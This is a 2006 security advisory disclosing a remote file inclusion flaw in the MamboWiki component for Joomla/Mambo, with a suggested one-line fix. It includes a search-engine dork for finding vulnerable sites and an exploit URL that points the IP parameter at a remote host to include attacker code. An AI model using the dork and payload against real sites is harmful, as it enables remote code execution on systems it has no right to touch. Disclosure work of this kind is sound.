Joomla MamboWiki Component <= 0.9.4 Remote File Inclusion Vulnerability

.:[ insecurity research team ]:.

.__..____.:.______.____.:.____ .

.:. |  |/    \:/  ___// __ \:/   _\.:.

: |  |   |  \\____\\  ___/\   /__ :. .

..: |__|___|  /____  >\___  >\___  >.:

.:.. ..  .\/   .:\/:.  .\/.  .:\/:

.   ...:.    .advisory.    .:...

:..................: 18.o8.2oo6 ..

Affected Application: MamboWiki <= v0.9.4

(Mambo/Joomla CMS Component)

. . :[ contact ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .

Discoverd by: camino

Team: Insecurity Research Team

URL: http://www.insecurityresearch.org

E-Mail: camino[at]sexmagnet[dot]com

. . :[ insecure application details ]: . . . . . . . . . . . . . . . . .

Typ: Remote [x]  Local [ ]

Remote File Inclusion [x]  SQL Injection [ ]

Level: Low [ ]  Middle [ ]  High [x]

Application: MamboWiki

Version: <= 0.9.4

Vulnerable File: MamboLogin.php

URL: http://www.lyquidity.com

Description: A component like Wikipedia for Jooma/Mambo.

Dork: inurl:"com_mambowiki"

. . :[ exploit ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .

http://[sitepath]/[joomlapath]/components/com_mambowiki/

MamboLogin.php?IP=http://huh?

. . :[ how to fix ]: . . . . . . . . . . . . . . . . . . . . . . . . . .

o1.) open MamboLogin.php

o2.) add this in line 8:

defined( '_VALID_MOS' ) or

die( 'Direct Access to this location is not allowed.' );

o3.) done!

. . :[ greets ]: . . . . . . . . . . . . . . . . . . . . . . . . . . . .

my girlfriend, brOmstar, ACiDAngel, PoKi, Waze and all the sexy members

of insecurity research team ;-)